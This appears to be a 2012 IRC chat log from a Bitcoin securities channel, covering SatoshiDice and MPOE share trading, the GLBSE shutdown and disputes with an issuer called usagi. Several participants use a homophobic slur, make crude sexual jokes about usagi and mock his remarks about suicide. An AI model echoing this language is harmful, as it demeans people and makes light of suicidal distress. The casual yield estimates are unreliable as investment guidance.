Dec 24 18:02:07 The most important thing for me is to see the volume is back Dec 24 18:02:20 If this volume keeps up Dec 24 18:02:31 S.DICE will be a great investment for a long time Dec 24 18:03:24 5-10 years im hoping. Dec 24 18:03:30 i know that's what i plan for mpoe Dec 24 18:05:36 Well this month we are on pace for around 425,000 BTC bet this month Dec 24 18:05:49 expect return of 8,150 / month Dec 24 18:06:58 ;;calc 8150/.0034/100000000*12*100 Dec 24 18:06:59 28.7647058824 Dec 24 18:07:08 28% expected return / yr Dec 24 18:07:36 lets say 25% since price is at .00355 Dec 24 18:07:42 ;;ticker S.DICE Dec 24 18:07:42 (ticker [--bid|--ask|--last|--high|--low|--avg] [--currency XXX]) -- Return pretty-printed mtgox ticker. If one of the result options is given, returns only that numeric result (useful for nesting in calculations). If '--currency XXX' option is given, returns ticker for that three-letter currency code. It is up to you to make sure that the three letter code you enter is a valid (1 more message) Dec 24 18:07:46 [MPEX] [S.MPOE] 10600 @ 0.00062 = 6.572 BTC [+] Dec 24 18:10:33 [MPEX] [S.MPOE] 20200 @ 0.00062 = 12.524 BTC [+] Dec 24 18:15:18 finally btc finance sounds like fucking finance Dec 24 18:15:23 as opposed to w/e it was before. Dec 24 18:19:09 [MPEX] [S.MPOE] 7400 @ 0.00062 = 4.588 BTC [+] Dec 24 18:22:29 < pigeons> "I am interested in hiring an accountant, although smickles is probably out of the question" <<< too bad, i am curious tho, where'd you see that? Dec 24 18:27:06 ROFL - https://bitcointalk.org/index.php?topic=130754.msg1418267#msg1418267 Dec 24 18:27:48 [MPEX] [S.MPOE] 7471 @ 0.00062 = 4.632 BTC [+] Dec 24 18:53:43 [MPEX] [S.MPOE] 10820 @ 0.00062 = 6.7084 BTC [+] Dec 24 19:17:21 another exchange -> https://bitcointalk.org/index.php?topic=133147.msg1418238#msg1418238 Dec 24 19:18:06 "The exchange is based on a different model than GLBSE or MPEx. The main concept of the new model is that PicoStocks is the legal owner of all assets. Users trading the assets can benefit from profits or buy and sell the assets to other users. PicoStocks is a legal person established under the jurisdiction of Marshall Islands. " Dec 24 19:23:52 https://bitcointalk.org/index.php?topic=130754.msg1418362#msg1418362 Dec 24 19:28:44 whoops Dec 24 19:39:25 [MPEX] [S.MPOE] 5401 @ 0.00062 = 3.3486 BTC [+] Dec 24 19:40:16 ill get used to this shit. Dec 24 19:46:52 [MPEX] [S.MPOE] 8700 @ 0.00062 = 5.394 BTC [+] Dec 24 19:49:49 oh, i didn't expect you to put it in the list - I was wondering if anyone had heard much about it in the background? Dec 24 19:52:25 [MPEX] [S.MPOE] 3600 @ 0.00062 = 2.232 BTC [+] Dec 24 20:02:18 so basically picostocks is the stock generation scam, yet again. Dec 24 20:02:28 lol Dec 24 20:02:35 what isnt a scam? Dec 24 20:02:37 kakobrekla i srsly wouldn't be listing that shit. Dec 24 20:02:47 ;;seen smickles Dec 24 20:02:48 smickles was last seen in #bitcoin-assets 1 hour, 40 minutes, and 17 seconds ago: < pigeons> "I am interested in hiring an accountant, although smickles is probably out of the question" <<< too bad, i am curious tho, where'd you see that? Dec 24 20:03:14 ;;ticker Dec 24 20:03:15 BTCUSD ticker | Best bid: 13.35083, Best ask: 13.42890, Bid-ask spread: 0.07807, Last trade: 13.35083, 24 hour volume: 16486.50787807, 24 hour low: 13.16005, 24 hour high: 13.45000, 24 hour vwap: 13.32690 Dec 24 20:03:31 dont worry Dec 24 20:03:35 noone reads the topic. Dec 24 20:03:57 the xmas bumb Dec 24 20:04:10 bump Dec 24 20:06:14 only 700k shares left Dec 24 20:06:16 nuts Dec 24 20:10:09 lol that's a point Dec 24 20:13:04 i'm so sick of usagi Dec 24 20:13:12 fucking pay me my liquidation Dec 24 20:18:31 liquidation ? Dec 24 20:18:37 is this YARR ? Dec 24 20:18:57 I couldn't keep up with the different assets he was involved with... Dec 24 20:22:53 [MPEX] [S.MPOE] 5700 @ 0.00062 = 3.534 BTC [+] Dec 24 20:23:56 smickles: the reference to hiring an accountant was from the prospectus tab on https://btct.co/security/BMF Dec 24 20:24:14 it says that prospectus was recently changed, but I still see your name in it Dec 24 20:25:02 hmm Ukto so you have been threatened unless you delisted usagi I see Dec 24 20:27:23 I stated quite clearly that 'some buttons were pressed on my side'. How he wishes to interpret that is up to him. Dec 24 20:31:29 I'm waiting for someone to respond to the "What do you want me to do, kill myself?" question he posed Dec 24 20:33:27 I wish he would disappear. Dec 24 20:33:51 or at least stop being dumb with other people's money Dec 24 20:35:20 [MPEX] [S.MPOE] 7050 @ 0.00062 = 4.371 BTC [+] Dec 24 20:46:33 >reads threads Dec 24 20:46:36 >sees youtube link Dec 24 20:46:40 >clicks Dec 24 20:46:46 GLORIOUS.jpg Dec 24 20:49:11 https://www.youtube.com/watch?v=EZAVhy9G7So Dec 24 20:52:54 [MPEX] [S.MPOE] 5438 @ 0.00062 = 3.3716 BTC [+] Dec 24 20:54:02 https://bitcointalk.org/index.php?topic=130754.msg1418362#msg1418362 Dec 24 20:54:59 *super mario bros 2 music* "This shit never ends." Dec 24 20:55:02 .... Dec 24 20:55:07 I just had a very bad idea. Dec 24 20:55:11 A very very bad idea. Dec 24 20:55:55 bitcointalk thread simulators. Dec 24 20:57:49 quoth usagi, "it's not my fault..." Dec 24 20:59:00 "and I tried to make things right and the community fucked me straight up the ass. What do you want me to do, kill myself?" Dec 24 20:59:26 no, no, no.... well. kind of. Dec 24 20:59:29 who's quote is that? Dec 24 20:59:54 Namjies: usagi just got fucked straight up the ass by the community Dec 24 21:00:03 I knew that 55 gallon drum of lube would come in handy Dec 24 21:00:36 https://bitcointalk.org/index.php?topic=133170.msg1418466#msg1418466 Dec 24 21:00:44 What's up with the BTC community members always carrying 55 gallon drums of lube? Dec 24 21:00:56 I dunno, its cheap on amazon Dec 24 21:01:05 pigeons: baleeted Dec 24 21:01:06 xD Dec 24 21:01:14 pigeons: or thats the wrong url Dec 24 21:01:33 I dunno though, I keep telling usagi to quit dressing up like a japanese schoolgirl Dec 24 21:01:42 matthewh3, "I just created this new address in my blockchain.inf/MyWallet - 12LFYVWKz5wWaofhHGnB5EXtkJwGV2yGAy - as you can see it has the word GAy at the end. Can I get the private key for that address and sell it, is that possible. Dec 24 21:02:00 pigeons: oh, that post Dec 24 21:02:20 in b4 someone firstbits gay Dec 24 21:02:26 HI GIGA Dec 24 21:02:34 merry holidays! Dec 24 21:02:45 s/merry/happy/ Dec 24 21:03:07 where is usagi Dec 24 21:03:23 being fucked straight up the ass by the community, apparently Dec 24 21:03:23 seems he's gone off the deep end Dec 24 21:03:26 funny you should mention him, I've been talking about that feloow Dec 24 21:03:27 [MPEX] [S.MPOE] 10200 @ 0.00062 = 6.324 BTC [+] Dec 24 21:03:46 gigavps: oh oh oh, you've seen this thread right? https://bitcointalk.org/index.php?topic=130754.msg1418267#msg1418267 Dec 24 21:03:52 he says he can't payout unless he's on an exchange Dec 24 21:04:24 read last post of that page and all of page 2 Dec 24 21:04:32 lol Dec 24 21:04:40 i saw his "last post" Dec 24 21:04:52 https://bitcointalk.org/index.php?topic=133168.0 Dec 24 21:05:32 i thought he knew how to program? so if so, why can't he make a little payment system Dec 24 21:05:41 no he doesnt Dec 24 21:05:47 ahhh Dec 24 21:05:49 also, fuck him Dec 24 21:06:06 but he was in here saying that he was programming in rails or something Dec 24 21:06:22 for his "other" project Dec 24 21:06:26 my mom died 2 months ago, you dont see whining like a little bitch about shit Dec 24 21:06:30 so the same illuminati that threatened nefario has come after Ukto Dec 24 21:06:39 the learn a language thing Dec 24 21:06:48 gigavps: he tried to learn one Dec 24 21:06:53 heavy emphasis on tried Dec 24 21:06:53 Diablo-D3 very sorry to hear that Dec 24 21:07:09 heh, there is no trying, only doing Dec 24 21:07:25 "I envision the next posting I make here being a scan of the surgery papers I turned down because there's a 15% chance I will die in surgery. Fuck you all. " Dec 24 21:07:26 well, I gave up the whole learning a language thing. its easier to just write my own. Dec 24 21:07:44 pigeons: oh, so hes getting the gender reassignment surgery? Dec 24 21:08:00 its all your fault Dec 24 21:08:01 i guess the drama never stops on the forums Dec 24 21:08:15 pigeons who did what? Dec 24 21:08:15 gigavps: needs more smb2 music Dec 24 21:08:32 gigavps: just usagi BS, not worth your time Dec 24 21:09:07 well, i've made an entire system to make payments, but since usagi can't program, i guess he won't be doing that Dec 24 21:10:16 Diablo-D3, but... you just did... once... Dec 24 21:10:51 Here, have a sad song: http://www.youtube.com/watch?v=AZRdPS2xlcc&list=PL2019F934A3AA4D1B Dec 24 21:11:15 Well more like plain instrumental Dec 24 21:11:50 https://bitcointalk.org/index.php?topic=130754.msg1418400#msg1418400 Dec 24 21:12:04 i don't think it gets any more drama than that Dec 24 21:12:27 so, you have your own payment system for gigamining eh? Dec 24 21:13:43 Namjies yes Dec 24 21:14:03 Sounds nice Dec 24 21:14:05 i'm down about $25k so far for glbse closing Dec 24 21:14:16 and were not done Dec 24 21:14:22 we're Dec 24 21:14:24 I'm not surprised Dec 24 21:14:47 maybe i should send a bill to nefario and ColdHardMetal Dec 24 21:15:33 gigavps: I dare you Dec 24 21:15:43 infact, triple dog dare you Dec 24 21:15:56 this is not the first time i've thought about it Dec 24 21:16:20 Well technically the fees were for things like a lawyer for yourself and I don't think they had to keep anyone on their exchange if they didn't want to. Dec 24 21:16:43 You'd have more chance suing for damages caused by Nefario's rash decisions. Dec 24 21:17:14 i have been choosing to focus on positive stuff rather than negative Dec 24 21:17:43 Well, wouldn't be bad that Nefario knows... send him the bill regardless. Dec 24 21:18:31 we'll see how things fall into place for 2013 Dec 24 21:19:30 I hope amazingrando gives signs of life. Dec 24 21:19:51 he relisted, just not paying Dec 24 21:20:04 Bitcoin Oz posted in my thread that he relisted Dec 24 21:20:14 doesn't do much good if you aren't paying Dec 24 21:21:11 We had a private deal. Shouldn't be impacted at all. Dec 24 21:21:26 so he just hasn't responded at all? Dec 24 21:24:05 [MPEX] [S.MPOE] 10300 @ 0.00062 = 6.386 BTC [+] Dec 24 21:26:07 He hasn't been responding in quite some time. Dec 24 21:26:31 wow Dec 24 21:27:17 Dates back when he relisted and said he'd start paying again when he'd get his ASIC miners. Dec 24 21:27:22 Then poof. Dec 24 21:27:40 Not answering any PM Dec 24 21:28:00 look at "issuer detail" under contract & prospectus now for https://btct.co/security/SILVER Dec 24 21:29:45 poor guy Dec 24 21:30:22 so Dec 24 21:30:30 like everyone is bullying usagi? Dec 24 21:30:31 lol Dec 24 21:30:41 [MPEX] [S.MPOE] 9042 @ 0.00062 = 5.606 BTC [+] Dec 24 21:30:48 ;;ticker Dec 24 21:30:48 BTCUSD ticker | Best bid: 13.36461, Best ask: 13.43961, Bid-ask spread: 0.07500, Last trade: 13.36411, 24 hour volume: 15856.68691214, 24 hour low: 13.18144, 24 hour high: 13.45000, 24 hour vwap: 13.35680 Dec 24 21:31:45 thestringpuller: we're tired of his shit Dec 24 21:33:18 he's had 6 posts since his "final public post EVER" Dec 24 21:33:31 I'm getting NO votes on BTC-BOND it seems. Dec 24 21:33:43 what are the reasons Dec 24 21:34:21 there you go Dec 24 21:34:37 approved Dec 24 21:34:43 I dunno, I wonder if hes trying to prevent me from paying DMC shares to him Dec 24 21:34:52 because its not going to work Dec 24 21:35:01 Ah well thanks Dec 24 21:35:10 I'm going to announce it then. Dec 24 21:36:23 announce what? Dec 24 21:36:24 Diablo-D3: He's going to kill himself and I won't get my money!!! Dec 24 21:36:35 Don't bully people! Dec 24 21:37:37 [MPEX] [S.MPOE] 6791 @ 0.00062 = 4.2104 BTC [+] Dec 24 21:37:55 That BTC-BOND has been approved and you can make a claim. Dec 24 21:38:22 I actually paid many small holders. Dec 24 21:38:38 usagi has apologized to eskimobob https://bitcointalk.org/index.php?topic=133144.msg1418525#msg1418525 Dec 24 21:39:17 OH SHIT ITS THE END OF THE WORLD FOR REAL THIS TIME Dec 24 21:39:31 no that's when mpoe-pr and bob make up Dec 24 21:39:39 >hundreds of holdings Dec 24 21:39:48 THERE WASNT EVEN 3 DOZEN ASSETS ON GLBSE Dec 24 21:40:03 [MPEX] [S.MPOE] 10214 @ 0.00062 = 6.3327 BTC [+] Dec 24 21:40:28 he had 200 shares of OBSI.HYPT = "hundreds of holdings" :) Dec 24 21:41:40 He has a lot more than 200 OBSI =P Dec 24 21:42:11 that was in the insured, low risk tranch Dec 24 21:42:50 OBSI is gone Dec 24 21:42:50 That was in the through-the-roof risk range. Dec 24 21:43:09 like in jail gone from what I heard Dec 24 21:43:25 Wait, really? Dec 24 21:43:46 but bob did didn't (s)he? --> https://bitcointalk.org/index.php?topic=131993.msg1414355#msg1414355 Dec 24 21:44:04 obsi quit because he got tired of the drama Dec 24 21:44:08 he paid out everybody Dec 24 21:44:16 its how I paid off half the dmc shares Dec 24 21:45:08 "I am a worthless, petty, little fuck. Please believe me. All I want to do is pay out shareholders and I am done." Dec 24 21:45:08 ah Dec 24 21:45:23 give usagi the chance to do the same? Dec 24 21:45:29 he may just disapear Dec 24 21:45:42 obsi wasnt a fucking faggot though Dec 24 21:45:43 markedathome: differnt bob, but good one Dec 24 21:45:48 gone with the wind Dec 24 21:45:49 I dunno, maybe I should give usagi an offer Dec 24 21:46:00 yes so I can get my money Dec 24 21:46:02 :P Dec 24 21:46:05 no I mean like Dec 24 21:46:18 sign his immortal soul over to me and do my bidding Dec 24 21:46:24 and Ill take on his debts Dec 24 21:46:32 cool give me my money Dec 24 21:47:10 i'm going to create a BTC debt collection agency Dec 24 21:47:21 what you mean like btcjam? Dec 24 21:47:21 seems like that would be profitable Dec 24 21:47:33 no mafia style repo service Dec 24 21:47:48 give us a BTC address of someone who owes you money, we take care of the rest Dec 24 21:47:51 seems like it would be unprofitable Dec 24 21:48:15 the most productive btc debt collection i know of was shakaru, who still owes thousands Dec 24 21:48:15 :P Dec 24 21:51:03 how did he collect? Dec 24 21:51:05 how did he lose money? Dec 24 21:51:54 [MPEX] [S.MPOE] 3500 @ 0.00062 = 2.17 BTC [+] Dec 24 21:53:18 ;;seen mircea_popescu Dec 24 21:53:18 mircea_popescu was last seen in #bitcoin-assets 1 hour, 43 minutes, and 8 seconds ago: lol that's a point Dec 24 21:53:31 imsaguy collected money every time he earned some and distributed it to shakaru's creditors Dec 24 22:08:32 I dunno, I dont get why the fuck everyone is so ... whatever Dec 24 22:08:40 I was going to say greedy, but thats not the right word Dec 24 22:08:46 fucking retarded is closer to what I want Dec 24 22:08:54 like, Im greedy. Dec 24 22:08:58 Im the most greedy man alive Dec 24 22:09:17 Im so greedy, Im trying to make a company that makes a shitload of money just so I can be the CEO who makes a brazillion dollars a year Dec 24 22:09:35 I mean, why the fuck steal a few thousand dollars when you can have them throw $20m at you every year Dec 24 22:10:06 Stealing a few thousands takes a lot less skills? Dec 24 22:10:19 "when you have it, flaunt it" Dec 24 22:14:54 [MPEX] [S.MPOE] 8078 @ 0.00062 = 5.0084 BTC [+] Dec 24 22:25:54 [MPEX] [S.MPOE] 5252 @ 0.00062 = 3.2562 BTC [+] Dec 24 22:28:01 Diablo-D3: don't you own a mining company that doesn't mine? Dec 24 22:28:55 thestringpuller: no Dec 24 22:29:07 thestringpuller: to classify DMC as only a mining company doesnt make sense Dec 24 22:30:19 thestringpuller: I dont get why everyone gets hung up on that Dec 24 22:30:27 the mining hardware was going to be put in the data center Dec 24 22:30:49 no data center, no hardware Dec 24 22:32:37 so why be called diablo mining co Dec 24 22:32:46 Diablo "Mining" Corp. > Diablo Management Corp. or Diablo Microtechnology Corp. Dec 24 22:32:50 dmc 2.0 wont be called that. Dec 24 22:32:51 Change the name =P Dec 24 22:33:06 Im just going to use the name I was going to use for the web hosting front Dec 24 22:36:11 thestringpuller: basically, it was just going to be mining, then I started fleshing the plan out Dec 24 22:36:19 could as well be Diablo Mythology Corp Dec 24 22:36:31 the plan that we have now is the one I published, it hasnt changed Dec 24 22:36:32 Diablo-D3: did you write the diablo miner? Dec 24 22:36:37 yes Dec 24 22:36:45 I remember using that back in the day Dec 24 22:36:55 what do you use now? Dec 24 22:37:01 I don't mine now? Dec 24 22:37:05 oh Dec 24 22:37:20 ;;bc,stats Dec 24 22:37:22 I don't have 100's of thousands in btc upstart capital Dec 24 22:37:22 Current Blocks: 213470 | Current Difficulty: 3370181.7992778 | Next Difficulty At Block: 213695 | Next Difficulty In: 225 blocks | Next Difficulty In About: 1 day, 17 hours, 18 minutes, and 45 seconds | Next Difficulty Estimate: 2977933.80142681 | Estimated Percent Change: -11.6387785945 Dec 24 22:37:53 Buy X.IDIFF Dec 24 22:37:56 lol Dec 24 22:38:07 miners are packing up and going home Dec 24 22:39:52 Where is the plan mr. Dec 24 22:39:54 Diablo-D3: Dec 24 22:40:07 first post of dmc thread =P Dec 24 22:40:25 i'm lazy Dec 24 22:40:33 ;;google first post of dmc thread Dec 24 22:40:34 DMC-Threads. Emma's Blog on Cross Stitching, Needlepoint ...: ; Panasonic Lumix DMC-LX7K 10.1MP 24mm Wide Angle Digital ...: ; Panasonic Lumix DMC-GF3XK 12.1 MP Camera G X Vario PZ 14 ...: https://bitcointalk.org/index.php?topic=77469 Dec 24 22:40:55 thestringpuller: did you miss most of the drama? Dec 24 22:41:25 Bitinstant beat you to the 1m mark Dec 24 22:41:47 like, nefario tried to remove me as CEO of my own company Dec 24 22:42:06 he locked my GLBSE account and did a shareholder vote Dec 24 22:42:10 nefario was massively outvoted Dec 24 22:42:36 i don't care about that Dec 24 22:42:51 BitInstant and MPEX have already beat you to that 1m mark Dec 24 22:43:02 and then usagi tried to fuck dmc over and is apparently ragequitting for a second time Dec 24 22:43:49 and several (actual) mining companies collapsed the mining market when they started selling shares that wernt backed by hardware and borderline pyramid scheme paid out dividends on said fake shares Dec 24 22:44:02 in the end I won against everything, but meh Dec 24 22:44:07 too much fucking drama Dec 24 22:44:20 then avoid the drama and deal with smart people in the illumaniti shadow world Dec 24 22:44:25 [MPEX] [S.MPOE] 9700 @ 0.00062 = 6.014 BTC [+] Dec 24 22:44:38 thestringpuller: honestly, thats what Im probably going to do Dec 24 22:44:57 like, at least two smaller VC groups are interested in my plan Dec 24 22:45:14 but dont want bitcoin along for the ride Dec 24 22:46:10 i think bitcois will ultimately be able to pay for code Dec 24 22:46:17 large code bases* Dec 24 22:46:25 ugh silly snow storm messin up my internet Dec 24 22:46:38 well, bitcoin paid for development of dm =P Dec 24 22:48:32 why aren't you out skiing then like a rich person Dec 24 22:52:34 I dont care for that lifestyle Dec 24 22:55:41 laaaaame snowboarding is awesome Dec 24 22:58:36 not really Dec 24 23:10:29 [MPEX] [S.MPOE] 15000 @ 0.00062 = 9.3 BTC [+] Dec 24 23:27:02 merry christmas Dec 24 23:41:29 Diablo-D3: http://trilema.com/2012/the-bitcoin-drama-timeline/ - says you lost 10k Dec 24 23:43:00 thestringpuller: I already bitched at mircea_popescu over that Dec 24 23:43:32 thestringpuller: I had 20k shares out there at maximum, but basically all of them were never sold for more than even a third of a btc Dec 24 23:44:04 thestringpuller: even though the plan was to sell shares for 1BTC each, that doesnt mean I had 20k Dec 24 23:44:11 thestringpuller: plus, I bought back half the shares Dec 24 23:44:42 so if I lost 10k like he said, I'd have negative assets atm Dec 24 23:45:20 well, 0 or less assets Dec 24 23:45:56 thestringpuller: DMC had about 3k BTC put into it, I lost about half off that, I made about half of that, and then I paid out about half of that. Dec 24 23:46:13 thestringpuller: in the end, the average investor made about 5-10% on his money Dec 24 23:49:16 but didn't you dilute the early investors shares Dec 24 23:58:30 [MPEX] [S.MPOE] 2900 @ 0.00062 = 1.798 BTC [+] Dec 24 23:58:51 thestringpuller: yes BUT I did so with permission of early investors Dec 24 23:58:58 infact, the idea came from one of them Dec 24 23:59:59 Diablo-D3 made a correction. better ? Dec 25 00:00:16 So what is the final judgement? Dec 25 00:00:27 mircea_popescu: what did you change it to? Dec 25 00:00:27 I'm not here to pass and judgement I just want the truth :P Dec 25 00:00:30 2k Dec 25 00:00:34 XD Dec 25 00:00:36 mircea_popescu: works for me Dec 25 00:01:07 mircea_popescu: can I pm you about the article I am writing on you? Dec 25 00:01:14 mircea_popescu: just add the part where I bought half the shares back at market value, which was higher than what people originally bought the shares for Dec 25 00:01:22 mircea_popescu: happened shortly before the glbse shutdown Dec 25 00:01:42 thestringpuller: well, the end of the story so far is what I just told mircea_popescu Dec 25 00:02:00 thestringpuller: nefario shut glbse down, investors have to sit and wait until everything gets sorted out Dec 25 00:02:09 sure. Dec 25 00:08:47 I dunno why eskimobob keeps trying to attack me on this shit Dec 25 00:08:51 its not like I have any beef with him Dec 25 00:09:25 hes just annoying cunt at times, but thats about it Dec 25 00:09:41 hes not a major dmc investor, and he bought shares at their lowest price as well Dec 25 00:09:45 he has like 50 shares Dec 25 00:09:47 some beef is everlasting Dec 25 00:10:02 so when shit gets going again, hes probably going to make a profit Dec 25 00:13:33 I mean like, both me and him agree usagi is a fucking asshole and an unstable one at that Dec 25 00:13:41 so its not like we cant see eye to eye on shit Dec 25 00:14:22 and you're going to keep me from getting my money by causing usagi to commit suicide before i get paid Dec 25 00:14:30 then you and I shall have beef Dec 25 00:14:35 and it will be everlasting Dec 25 00:14:38 to da grave! Dec 25 00:14:38 burnside talked him down from the edge Dec 25 00:15:18 thestringpuller: hey man, I want usagi to be legit Dec 25 00:15:31 he could be an asset to the community if he'd quit fucking around Dec 25 00:15:32 I'm greedy I want my money! Dec 25 00:16:28 no he's no potential asset to the community Dec 25 00:17:07 other than as a cautionary tale Dec 25 00:17:19 on not letting your kids eat lead paint Dec 25 00:17:21 I want him to just liquidate so I can get my money!!! Dec 25 00:17:32 after that he can do whatever he wants Dec 25 00:18:30 heh I know Dec 25 00:18:36 I'll take him on as my sex slave. Dec 25 00:18:58 all he has to do is dress up in that cute schoolgirl outfit he has from time to time Dec 25 00:20:04 errrrrrrrrrrrrrr Dec 25 00:20:04 http://polimedia.us/dtng/c/src/135325705914.jpg Dec 25 00:20:08 mircea_popescu: you need to correct something else too Dec 25 00:20:13 you said OBSI.* 3k Dec 25 00:20:20 no, it was just obsi's pirate passthrough Dec 25 00:20:34 obsi.1mhs and obsi.abmo paid out in full Dec 25 00:21:15 which was the pirate pt ? .hyip ? Dec 25 00:21:26 I cant remember Dec 25 00:21:32 obsi claimed it was not a pirate passthrough Dec 25 00:21:41 pigeons: it was Dec 25 00:21:45 but he had his setup differently Dec 25 00:21:51 maybe it was Dec 25 00:22:00 but he claimed it was to different "sekrit" investments Dec 25 00:22:09 same MO as pirate Dec 25 00:22:25 not that I remember Dec 25 00:22:32 and obsi hasnt defaulted on it yet either Dec 25 00:22:40 hes still holding the door open in case pirate comes clean Dec 25 00:22:41 no he hasn't defaulted on it Dec 25 00:22:42 imo the small ones that paid out in full pretty much worked as a prop Dec 25 00:22:45 poor man's gpumax Dec 25 00:22:53 because the contract says he invests in random crap that may never pay Dec 25 00:23:00 You might have a hard time keeping that 5-10% profit true, Diablo Dec 25 00:23:08 it was not claimed to be a pirate passthrough, you can look it up Dec 25 00:23:13 Namjies: well, for the 10k, its already true and set in stone Dec 25 00:23:16 I bought the shares back Dec 25 00:23:29 I'm reffering to BTC-MINING Dec 25 00:23:35 Namjies: remember, most of them were sold to secure asicminer shares Dec 25 00:24:33 That might be a complete loss if amazingrando just disappears. Dec 25 00:24:40 yeah, but you're not my largest asset Dec 25 00:24:52 and if I just use my own money to buy back shares, it doesnt matter either way Dec 25 00:25:09 Might still wipe that 5% profit isn't it? Dec 25 00:25:22 no Dec 25 00:25:27 it depends entirely on the market, for one Dec 25 00:25:36 I cant buy back shares for more than what people sell them for Dec 25 00:26:12 Hopefully he's just away. He's been busy ever since GLBSE closed down. I fear wishful thinking won't be of any help unfortunatly. Dec 25 00:26:12 you caaan Dec 25 00:26:25 I said "might" Dec 25 00:26:25 thestringpuller: markets dont work that way Dec 25 00:26:40 of course it can still change based on market Dec 25 00:26:43 THEY SHOULD Dec 25 00:26:48 Namjies: remember profit is not how well the company performs at this point Dec 25 00:27:07 Namjies: its how much money originally went in to sell the shares, and how much money went out to buy the shares back Dec 25 00:27:13 Namjies: as it stands, more went out then went in Dec 25 00:27:37 Ah, all is well then I guess. Dec 25 00:28:36 assets will be sold last anyhow Dec 25 00:29:19 even if I just sell them to myself as the last act of DMC 1.0, they get sold last. Dec 25 00:30:16 DMC Dec 25 00:30:21 doesn't seem profitable... Dec 25 00:30:54 thestringpuller: I could be renting racks out for $20-30k a month. It would not cost even a fraction of that to maintain them. Dec 25 00:31:13 why aren't you doing that? Dec 25 00:31:19 need the capital. Dec 25 00:31:25 ...uh huh Dec 25 00:31:28 something the community failed to generate. Dec 25 00:31:32 <.<;; Dec 25 00:31:37 thestringpuller: when I said this was a million dollar plan, I wasnt kidding. Dec 25 00:31:54 instead, they kept throwing it at shit that was an obvious scam from day one Dec 25 00:32:58 why don't you borrow the money Dec 25 00:33:01 from mircea_popescu Dec 25 00:33:10 bwhahahah oh man Dec 25 00:33:19 he has like no money Dec 25 00:33:52 thestringpuller: hes free to invest in 2.0 though Dec 25 00:33:57 I think he'd like the way Im doing that Dec 25 00:34:18 no more fucking shares, only real world straight across the board VC style funding Dec 25 00:34:27 ;;calc (10000000 - 600000) * 0.00062 * 13 Dec 25 00:34:27 75764 Dec 25 00:34:53 that's what he's made off the last block of shares for MPOE Dec 25 00:35:02 I dont even know if any of that is true Dec 25 00:35:16 you can add the numbers from assbot... Dec 25 00:35:29 yes, but are the numbers real? we dont know Dec 25 00:35:31 *le sigh* Dec 25 00:36:14 are your numbers real? Dec 25 00:36:19 i don't know :P Dec 25 00:36:22 well, lets put it this way Dec 25 00:36:33 I thought about running an exchange once Dec 25 00:36:46 and doing exactly that to generate interest on the exchange Dec 25 00:37:59 nope Dec 25 00:38:07 nope nope nope Dec 25 00:38:09 jk Dec 25 00:38:12 heh, well Dec 25 00:38:18 but srsly that sounds scammy Dec 25 00:38:20 I decided not to because that'd be unethical Dec 25 00:38:32 but it also means that other people most likely have thought the same idea Dec 25 00:38:38 and have less ethics than I do Dec 25 00:43:48 w00t refactoring! Dec 25 00:45:53 smickles: what did your daughter ask for for xmas? Dec 25 00:46:06 "zaat" Dec 25 00:46:12 zaat? Dec 25 00:46:19 she's about 1yr old Dec 25 00:46:37 oh haha Dec 25 00:46:38 I think "zaat" is "what's that?" Dec 25 00:47:59 also we don't really participate in that any more than receiving gifts which people insist on giving us despite us saying not to Dec 25 00:48:15 smickles: meh, Ive gone that route Dec 25 00:48:34 christmas isnt for me anymore Dec 25 00:49:39 thestringpuller 75764 BTC? That's not possible. Dec 25 00:49:53 I like to convert it all to cash and donate it to NASA Dec 25 00:49:58 75764 USD Dec 25 00:50:05 Ah, that makes more sense Dec 25 00:50:16 "it all" being the received gifts Dec 25 00:50:35 and SatoshiDice sold 7 million x at a minimum 0.0032 BTC per share... 22400 BTC minimum or over 250k USD Dec 25 00:50:49 donate it to spacex Dec 25 00:51:00 I say, if you want to celebrate somethin, let it be the advancement of mankind, not "the holidays" Dec 25 00:51:02 That is real numbers for sure. Dec 25 00:51:05 actually, did spacex ipo yet? Dec 25 00:51:08 thestringpuller: I may this year Dec 25 00:51:09 I know solar city did Dec 25 00:51:19 I'm not sure if they accept donations tho Dec 25 00:51:20 I'd be surprised Evoorhees would lie/not complain. Dec 25 00:51:22 SpaceX won't IPO until Tesla motors IPO's Dec 25 00:51:31 wait Dec 25 00:51:33 hasnt telsa? Dec 25 00:51:37 i don't think so Dec 25 00:51:38 I thought it did Dec 25 00:51:41 maybe Im wrong Dec 25 00:51:45 Tesla is still privately held Dec 25 00:51:48 it may not Dec 25 00:52:06 Musk said he wanted to wait until he had the cashflow to payback all initial investors Dec 25 00:52:13 before he went public with it Dec 25 00:52:17 i could be wrong though Dec 25 00:52:40 ahh Dec 25 00:52:42 should be soon then Dec 25 00:52:48 they just had their first positive quarter Dec 25 00:59:20 [MPEX] [S.MPOE] 9900 @ 0.00062 = 6.138 BTC [+] Dec 25 01:09:31 Namjies: why did you go with btct.co instead of bitfunder? Dec 25 01:10:44 [MPEX] [S.MPOE] 44450 @ 0.00062 = 27.559 BTC [+] Dec 25 01:11:13 Because of past history with litecoinglobal.com? Dec 25 01:11:27 [MPEX] [S.MPOE] 14408 @ 0.00062 = 8.933 BTC [+] Dec 25 01:11:29 Please great features to top it. Dec 25 01:11:35 Plus* Dec 25 01:11:56 Well cryptostocks is... well bad... Dec 25 01:12:08 bitfunder is new but good features. Dec 25 01:12:22 btct.co has past history and great features... Dec 25 01:12:33 bitfunder has limited slots to pay 10btc to glbse assets Dec 25 01:12:46 so you missed out on 10 btc Dec 25 01:12:52 oh Dec 25 01:13:05 I would have chosen MPEx first but I don't qualify I believe in volume or quality =P Dec 25 01:13:28 Except maybe BTC-BOND for quality... Dec 25 01:16:37 what do you mean btct.co has past history? Dec 25 01:17:10 oh past history with litecoinglobal i see Dec 25 01:18:28 [MPEX] [S.MPOE] 2900 @ 0.00062 = 1.798 BTC [+] Dec 25 01:18:50 count down to emptying of the next bock Dec 25 01:19:24 i bet 1 person has bought up 90% of the S.MPOE Dec 25 01:19:29 that was just released Dec 25 01:30:26 [MPEX] [S.MPOE] 11950 @ 0.00062 = 7.409 BTC [+] Dec 25 01:35:39 [MPEX] [S.MPOE] 3100 @ 0.00062 = 1.922 BTC [+] Dec 25 01:43:16 [MPEX] [S.MPOE] 6600 @ 0.00062 = 4.092 BTC [+] Dec 25 01:45:13 thestringpuller: well Diablo-D3 wouldn't be suprised if that one person is mircea_popescu Dec 25 01:46:03 [MPEX] [S.MPOE] 11364 @ 0.00062 = 7.0457 BTC [+] Dec 25 01:56:40 [MPEX] [S.MPOE] 11744 @ 0.00062 = 7.2813 BTC [+] Dec 25 01:58:21 [MPEX] [S.MPOE] 40800 @ 0.00062 = 25.296 BTC [+] Dec 25 02:04:03 pigeons: 